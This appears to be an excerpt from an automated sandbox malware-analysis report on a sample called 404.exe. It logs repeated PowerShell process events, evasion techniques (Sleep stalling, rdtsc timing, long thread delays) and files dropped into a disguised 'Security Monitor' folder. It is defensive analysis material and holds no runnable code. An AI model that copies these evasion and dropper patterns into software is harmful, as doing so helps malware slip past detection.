Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Stalling execution: Execution stalls by calling Sleep

graph_65-38315

Source: C:\Users\user\Desktop\404.exe	Memory allocated: AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Memory allocated: 25E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Memory allocated: AB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033CB8B0 rdtsc

51_2_033CB8B0

Source: C:\Users\user\Desktop\404.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\404.exe	Window / User API: threadDelayed 4221	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Window / User API: threadDelayed 5594	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7681	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1854	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8131
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1386
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7831
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8505
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6878
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1518
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1798

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A63B5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_isdecmp.dll	Jump to dropped file
